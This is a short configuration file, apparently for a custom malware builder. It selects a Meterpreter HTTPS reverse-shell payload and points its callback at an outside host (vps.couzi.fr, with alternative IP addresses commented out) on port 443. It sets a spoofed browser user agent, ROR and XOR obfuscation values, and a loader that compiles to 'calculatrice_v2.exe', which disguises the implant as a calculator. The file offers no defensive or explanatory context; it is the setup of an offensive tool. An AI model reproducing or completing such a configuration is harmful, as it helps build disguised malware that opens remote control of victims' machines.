[Payload]
# filename=meterpreter_tcp.nasm
filename=meterpreter_https.nasm
# filename=message_box.nasm

# tcp | https
mode=https
# SHELL & METERPRETER -> TCP
# lhost=10.161.114.127
# lhost=37.114.41.46
lhost=vps.couzi.fr
lport=443

user_agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.2903.86"

# METERPRE

# working:13,17,23
ror_value=23

# unique BYTE, need to implement simple syntax check
encryption_byte=0xa4

[Loader]
filename=loader.c
output_file=calculatrice_v2.exe

[Encryption] # - not implemented yes
# xor,aes,dict 
system=xor

# xor_key=0xf0


